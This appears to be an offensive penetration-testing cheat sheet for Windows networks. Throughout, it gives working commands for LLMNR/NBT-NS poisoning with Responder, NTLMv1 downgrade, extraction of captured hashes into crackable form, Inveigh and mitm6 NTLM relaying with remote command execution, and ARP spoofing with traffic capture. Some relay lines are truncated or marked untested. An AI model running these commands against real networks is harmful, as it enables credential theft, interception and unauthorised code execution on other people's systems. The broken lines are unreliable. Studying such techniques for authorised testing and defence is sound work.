Set challenge to 1122334455667788 in /etc/responder/Responder.conf

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3


NTLM MITM attacks


Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y

Packet can be captured in order to extract the hashes

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack

NTLM Relay

SMB signing has to be disable for this kind of attack. On Windows 10 machines IPv6 is prefered as IPv4.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
responder -I <interface> -r -d -w -tf smbrelay.txt

Add computer start BH (not tested) -t ldaps://<dc_fqdn> --add-computer
python -d <domain> -u <computer>\$ -p '<password>'

Priv exchange (not tested) -t ldap://<dc_fqdn> --escalate-user <user>

python -ah <fqdn> <dc_fqdn> -u <user> -d <domain>


mitm6 -d <fqdn> -wh <webserver_hosting_wpad>:80 -t smb://<target_ip>/ -i

Relay and delegation

ARP Spoofing

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -S 65535 -w out.pcap -vv

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -S 65535 -w out.pcap -vv